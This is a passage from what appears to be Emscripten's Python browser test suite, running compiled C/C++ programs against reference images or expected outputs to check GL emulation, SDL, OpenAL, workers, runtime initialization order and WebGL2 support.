self.btest(Path('third_party/cubegeom', 'cubegeom_normal.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_mt.c'), reference=Path('third_party/cubegeom', 'cubegeom_mt.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color2.c'), reference=Path('third_party/cubegeom', 'cubegeom_color2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_texturematrix.c'), reference=Path('third_party/cubegeom', 'cubegeom_texturematrix.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_fog.c'), reference=Path('third_party/cubegeom', 'cubegeom_fog.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2_vao2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao_es.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sFULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_u4fv_2.c'), reference=Path('third_party/cubegeom', 'cubegeom_u4fv_2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-sGL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-sLEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-sSTRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point {
int x, y;
};
''')
create_file('supp.c', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point *p) {
printf("supp: %d,%d\n", p->x, p->y);
mainFunc(p->x + p->y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.c', r'''
#include <stdio.h>
#include <assert.h>
#include "header.h"
extern void suppFunc(struct point *p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
assert(x == 56);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(&p);
printf("main see: %d\nok.\n", suppInt);
assert(suppInt == 76);
return 0;
}
''')
self.run_process([EMCC, 'supp.c', '-o', 'supp.wasm', '-sSIDE_MODULE', '-O2'])
self.btest_exit('main.c', args=['-sMAIN_MODULE=2', '-O2', 'supp.wasm'])
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
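# run both without and with a separate memory init file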
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
self.set_setting('WASM_ASYNC_COMPILATION', 0)
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
args = ['-sWASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1']
# with assertions, we notice when memory was written to too early
expected = 'abort:Assertion failed: native function `note` called before runtime initialization'
self.btest('mem_init.cpp', expected=expected, args=args)
# otherwise, we just overwrite
self.btest_exit('mem_init.cpp', args=args + ['-sASSERTIONS=0'])
def test_mem_init_request(self):
def test(what, status):
print(what, status)
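# If the page assigns Module.memoryInitializerRequest, the runtime uses that XHR's
# response as the memory initializer instead of issuing its own request; a bad URL
# therefore produces the console warning that the pre-js below watches for.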
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
maybeReportResultToServer('got_error');
}
console.log('WARNING: ' + x);
};
''')
self.btest('mem_init_request.cpp', expected=status, args=['-sWASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
self.set_setting('EXIT_RUNTIME')
test('test.html.mem', 'exit:0')
test('nothing.nowhere', 'got_error')
def test_runtime_misuse(self):
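# Exercise calling into compiled code through three paths (ccall, a cwrap'd function,
# and a direct Module._export call), both before the runtime is ready, where each call
# must abort under ASSERTIONS, and again after main() has run, where they succeed.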
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3:' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-sWASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(Path('browser/cwrap_early.cpp'), args=['-O2', '-sASSERTIONS', '--pre-js', test_file('browser/cwrap_early.js'), '-sEXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-O2', '--minify=0', '-sEXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one', '-sASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_with_pthread_compilation_fails(self):
self.run_process([EMCC, '-c', '-o', 'hello.o', test_file('hello_world.c')])
stderr = self.expect_fail([EMCC, 'hello.o', '-o', 'a.js', '-g', '--closure=1', '-sUSE_PTHREADS', '-sBUILD_AS_WORKER=1'])
self.assertContained("USE_PTHREADS + BUILD_AS_WORKER require separate modes that don't work together, see https://github.com/emscripten-core/emscripten/issues/8854", stderr)
def test_emscripten_async_wget2(self):
self.btest_exit('test_emscripten_async_wget2.cpp')
@disabled('https://github.com/emscripten-core/emscripten/issues/15818')
def test_emscripten_async_wget2_data(self):
create_file('hello.txt', 'Hello Emscripten!')
self.btest('test_emscripten_async_wget2_data.cpp', expected='0')
def test_emscripten_async_wget_side_module(self):
self.run_process([EMCC, test_file('browser_module.c'), '-o', 'lib.wasm', '-O2', '-sSIDE_MODULE'])
self.btest_exit('browser_main.c', args=['-O2', '-sMAIN_MODULE=2'])
@parameterized({
'non-lz4': ([],),
'lz4': (['-sLZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-sSIDE_MODULE', '-O2', '-o', 'library.so'])
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return preloadedWasm['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
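# '--preload-file .@/' packages the whole current directory (including library.so) at the
# FS root, and --use-preload-plugins lets a preload plugin pre-compile the side module,
# which is what the preloadedWasm check in main() looks for.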
self.btest_exit(
'main.c',
args=['-sMAIN_MODULE=2', '--preload-file', '.@/', '-O2', '--use-preload-plugins'] + args)
# This does not actually verify anything except that builds with --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest_exit('hello_world_gles.c', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid/test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = read_file('test.js')
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid/test.js'))
try_delete(test_file('uuid/test.js.map'))
# Now run test in browser
self.btest_exit(test_file('uuid/test.c'), args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],),
'legacy': (['-sMIN_FIREFOX_VERSION=0', '-sMIN_SAFARI_VERSION=0', '-sMIN_IE_VERSION=0', '-sMIN_EDGE_VERSION=0', '-sMIN_CHROME_VERSION=0', '-Wno-transpile'],)
})
@requires_threads
def test_html5_core(self, opts):
if '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0' in opts:
# In this mode an exception can be thrown by the browser, and we don't
# want the test to fail in that case so we override the error handling.
create_file('pre.js', '''
window.disableErrorReporting = true;
window.addEventListener('error', (event) => {
if (!event.message.includes('exception:fullscreen error')) {
report_error(event);
}
});
''')
self.emcc_args.append('--pre-js=pre.js')
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
print(opts)
self.btest_exit(test_file('test_gamepad.c'), args=[] + opts)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1'], ['-sUSE_PTHREADS']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'])
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest_exit(test_file('webgl_create_context2.cpp'))
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -sDISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser/html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'])
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest_exit(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'])
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
@requires_graphics_hardware
def test_webgl_shader_source_length(self):
for opts in [[], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'])
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
@requires_graphics_hardware
def test_webgl_unmasked_vendor_webgl(self):
self.btest_exit(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'])
@requires_graphics_hardware
def test_webgl2(self):
for opts in [
['-sMIN_CHROME_VERSION=0', '-Wno-transpile'],
['-O2', '-g1', '--closure=1', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-sFULL_ES2=1'],
]:
print(opts)
self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + opts)
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest_exit(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-sUSE_PTHREADS'])
@requires_graphics_hardware
def test_webgl2_objects(self):
self.btest_exit(test_file('webgl2_objects.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_html5_webgl_api(self):
for mode in [['-sOFFSCREENCANVAS_SUPPORT', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
['-sOFFSCREEN_FRAMEBUFFER', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest_exit(test_file('html5_webgl.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + mode)
@requires_graphics_hardware
def test_webgl2_ubos(self):
self.btest_exit(test_file('webgl2_ubos.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'])
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'))
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest_exit(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-sWEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'])
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest_exit(test_file('test_webgl2_runtime_no_context.cpp'), args=['-sMAX_WEBGL_VERSION=2'])
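# Hedged sketch (not wired into the suite): the fallback pattern the comment above describes,
# written against the emscripten/html5.h context API, where asking for majorVersion=2 and
# retrying with majorVersion=1 on failure is one way to fall back to WebGL1. The '#canvas'
# selector and the btest_exit wiring are assumptions for illustration.
def _sketch_webgl1_fallback(self):
  create_file('webgl_fallback.c', r'''
    #include <assert.h>
    #include <emscripten/html5.h>
    int main() {
      EmscriptenWebGLContextAttributes attrs;
      emscripten_webgl_init_context_attributes(&attrs);
      attrs.majorVersion = 2;
      EMSCRIPTEN_WEBGL_CONTEXT_HANDLE ctx = emscripten_webgl_create_context("#canvas", &attrs);
      if (ctx <= 0) {
        // WebGL2 creation failed: retry with a plain WebGL1 context.
        attrs.majorVersion = 1;
        ctx = emscripten_webgl_create_context("#canvas", &attrs);
      }
      assert(ctx > 0);
      return 0;
    }
  ''')
  self.btest_exit('webgl_fallback.c', args=['-sMAX_WEBGL_VERSION=2', '-lGL'])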
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest_exit(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-sMAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest_exit(test_file('webgl_with_closure.cpp'), args=['-O2', '-sMAX_WEBGL_VERSION=2', '--closure=1', '-lGL'])
# Tests that -sGL_ASSERTIONS and glVertexAttribPointer with packed types work
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest_exit(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-sMAX_WEBGL_VERSION=2', '-sGL_ASSERTIONS'])
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest_exit(test_file('webgl2_pbo.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party/sokol/mipmap-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=Path('third_party/sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party/sokol/mrt-emcc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party/sokol/arraytex-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
